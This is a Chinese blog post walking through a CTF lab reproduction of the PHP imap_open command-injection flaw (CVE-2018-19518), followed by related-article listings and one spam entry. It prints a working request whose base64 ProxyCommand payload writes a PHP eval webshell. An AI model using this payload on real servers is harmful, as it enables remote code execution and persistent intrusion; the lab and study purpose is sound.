【春秋云境】CVE-2018-19518 php imap扩展在PHP中执行邮件收发操作时其,map_open函数会调用rsh来连接远程shell

原创 已于 2025-12-10 11:20:19 修改 · 275 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#安全漏洞 #漏洞复测
于 2025-11-03 16:07:42 首次发布

一、靶场介绍

php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。

在这里插入图片描述

二、POC

首先上传这样一个webshell数据包,base64编码(因为为了能让我获取关注量,我要把数据包放到最后,请关注我,谢谢啦)
在这里插入图片描述
从webnshell中读取flag

在这里插入图片描述
这个是数据包,感谢您的关注。

POST / HTTP/1.1
Host: 127.0.0.1:13440
Content-Length: 154
Cache-Control: max-age=0
Origin: http://127.0.0.1:13440
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://127.0.0.1:13440
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

hostname=x+-oProxyCommand%3decho%09ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbImNtZCJdKTsnID4gL3Zhci93d3cvaHRtbC9hLnBocA==|base64%09-d|sh}a&username=222&password=333

三、总结

一个月后发现这个文章写的很乱,没有条理,就感觉不是我写的一样,但这确确实实是我写的,我写这篇文章是偷懒了,现在再优化一下。

CVE-2018-19518- imap 远程命令执行漏洞分析
lyy0xfff的博客
08-03 3794
CVE-2018-19518 IMAP 远程命令执行漏洞分析 0x00 漏洞介绍 IMAP协议(因特网消息访问协议)它的主要作用是邮件客户端可以通过这种协议从邮件服务器上获取邮件的信息,下载邮件等。它运行在TCP/IP协议之上,使用的端口是143。在php调用的是imap_open函数 imap_open( string $mailbox,string $user,string $password) 其中参数mailbox,是用来连接邮箱服务器的。它会调用rsh连接远程shell而,debian/ubu
[Vulhub] PHP imap远程命令执行漏洞CVE-2018-19518
weixin_45605352的博客
05-08 2677
0x01 预备知识 PHPimap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令。 php imap扩展用于在PHP执行邮件收发操作。其imap_open函数调用rsh连接远程shell,而debian / ubuntu中用来使用ssh来代替rsh的功能(即在debian系列系统中,执行rsh命令)实际执行的是ssh命令)。 因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。 如果启用了
PHP imap 远程命令执行漏洞复现(CVE-2018-19518
0xSec
12-27 1709
IMAP是在系统中执行任何命令的桥梁。Internet消息访问协议(IMAP)是电子邮件客户端用于通过TCP / IP连接邮件服务器检索电子邮件的Internet标准协议。IMAP由Mark Crispin于1986年设计为远程邮箱协议,与广泛使用的POP(一种用于检索邮箱内容的协议)形成对比。目前,IMAP由RFC 3501定义规格。IMAP的设计目标是允许多个电子邮件客户端完全管理电子邮件收件箱。因此,客户端通常会在服务器上保留消息,直到用户明确删除它们为止。
cve-2018-19518漏洞复现
m0_74402888的博客
04-28 1053
php imap扩展用户在php执行邮件收发操作,其imap_open函数调用rsh连接远程shell,而debianh/Ubuntu中默认使用ssh来代替rsh功能,也就是说debian系列系统中,执行rsh命令实际执行的是ssh命令debian系列系统有Ubuntu、kali、MX linux、AntiX、PureOS等ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者可以通过注入这个参数,最终将导致命令执行漏洞
CVE-2018-19518 漏洞复现
Jay17的博客
02-10 2011
CVE-2018-19518 漏洞复现
2024年PHP--远程命令执行漏洞CVE-2018-19518复现(1),2024年最新C C++最牛教材
2401_84973631的博客
05-13 473
然后我们访问该ip的8080端口,出现一个登陆界面,这里我们随意输入,准备采取抓包。%09后添加上面进行base64编码后的内容,再将部分内容进行url编码。点击send发送数据包以后,我们准备进入虚拟机查看是否创建成功。这里我们进入容器查看刚才文件是否创建成功,先查询id。使用burp进行抓包,并发送到Repeater里。然后我们进入到该目录下使用docker启动。首先进入环,最好在root权限下进行。查看容器id后在下面命令中输入id进入。然后我们修改数据包,添加一段执行代码。
漏洞复现的艺术:如何优雅地利用CVE-2018-19518进行渗透测试
weixin_29013129的博客
02-03 834
本文深入解析CVE-2018-19518漏洞的复现与利用技巧,详细介绍了PHPimap扩展中的远程命令执行漏洞原理、环搭建步骤及实战渗透方法。通过构造特殊IMAP服务器地址实现命令注入,绕过PHP安全限制,并提供防御方案与修复建议,帮助安全研究人员优雅地进行渗透测试。
CVE-2018-19518 PHP-IMAP 复现和学习 (环CTFShow web312)
paidx0
08-09 647
CVE-2018-19518复现和学习 漏洞描述 IMAP协议(因特网消息访问协议)它的主要作用是邮件客户端可以通过这种协议从邮件服务器上获取邮件的信息,下载邮件等。它运行在TCP/IP协议之上,使用的端口是143。在php调用的是imap_open函数 imap_open( string $mailbox,string $user,string $password) 其中参数mailbox,是用来连接邮箱服务器的。它会调用rsh连接远程shell而,debian/ubuntu中默认使用ssh来代替rs
PHP 远程命令执行漏洞CVE-2018-19518
qq_46501419的博客
03-21 1179
CVE-2018-19518详细信息影响范围复现过程 详细信息 在PHP和其他产品的imap_open()中使用的UNIX上的华盛顿大学IMAP工具包2007f启动rsh命令(借助于c-client / imap4r1.c中的imap_rimap函数和osdep / unix / tcp_unix中的tcp_aopen函数.c),而不会阻止参数注入,如果IMAP服务器名称是不受信任的输入(例如,由Web应用程序的用户输入),并且rsh已被具有不同参数的程序替换,则远程攻击者可能会执行任意OS命令语义。 例如
IMAP协议到命令执行CVE-2018-19518漏洞的底层机制剖析
weixin_29016315的博客
01-26 665
本文深入剖析了CVE-2018-19518漏洞的技术机理与防御实践,详细解析了IMAP协议与PHP交互中的安全隐患,以及如何通过参数注入实现命令执行。文章还提供了漏洞复现的实战检测方法和企业级防御方案,帮助开发者与安全人员全面理解并防范此类安全风险。
深入解析CVE-2018-19518:从IMAP协议到SSH命令注入的漏洞利用
weixin_29015483的博客
02-01 411
本文深入解析CVE-2018-19518漏洞,详细介绍了IMAP协议中imap_open函数的SSH命令注入原理及利用方式。通过实战案例演示了从基础Webshell写入到高级反弹shell的技巧,并提供了有效的防御方案和修复建议,帮助开发者和安全人员防范此类安全威胁。
PHP imap 远程命令执行漏洞CVE-2018-19518
大方子
08-04 4712
受影响版本 Ubuntuhttps://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-19518.html Debianhttps://security-tracker.debian.org/tracker/CVE-2018-19518 Red Hathttps://access.redhat.com/security/...
vulhub靶场php下的CVE-2018-19518PHP imap远程命令执行漏洞
vip文章私信我(我文章全免费),或者https://www.cnblogs.com/himobrine已经搬运到博客园
02-17 355
vulhub靶场php下的CVE-2018-19518PHP imap远程命令执行漏洞
CVE-2018-19518复现 imap_open()
heySister
03-22 3054
CVE-2018-19518 前几天候无聊翻了一下安恒杯2月的月赛题目,看到有一道是用了跟imap_open()这个函数有关的webshell,去查了一下,发现是个CVE。emm…刚开始查到的是freebuf上面的一个文章,还有另外一个一模一样的,也不知道是谁抄谁,还是都是翻译的国外的
PHP imap 远程命令执行漏洞 CVE-2018-19518 漏洞复现
ADummy的博客
02-25 467
PHP imap 远程命令执行漏洞CVE-2018-19518) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>代码执行 0x01漏洞介绍 ​ php imap扩展用于在PHP执行邮件收发操作。其imap_open函数调用rsh连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。 因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令
修复web生产平台项目下的漏洞修复(CVE-2018-19518CVE-2018-19935、CVE-2017-9798)
向技术大牛致敬
03-27 7061
漏洞信息: University of Washington IMAP Toolkit 2007f 命令注入漏洞(CVE-2018-19518) PHP 安全漏洞(CVE-2018-19935) Apache HTTP Server 安全漏洞(CVE-2017-9798)【原理扫描】 漏洞说明: University of Washington IMAP Toolkit 2007f...
Java微服务如何拆解订单补偿任务中心
最新发布
06-25
标题:Java微服务如何拆解订单补偿任务中心 内容概要:围绕核心链路、并发控制、异常补偿与可观测性建设,说明Java微服务如何拆解订单补偿任务中心的关键实现重点。 24直播网:chuanpu-sh.com 24直播网:m.csjt97.com 24直播网:kanchashejigongsi.com 24直播网:0571xnhr.com 24直播网:m.senwanghb.com
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值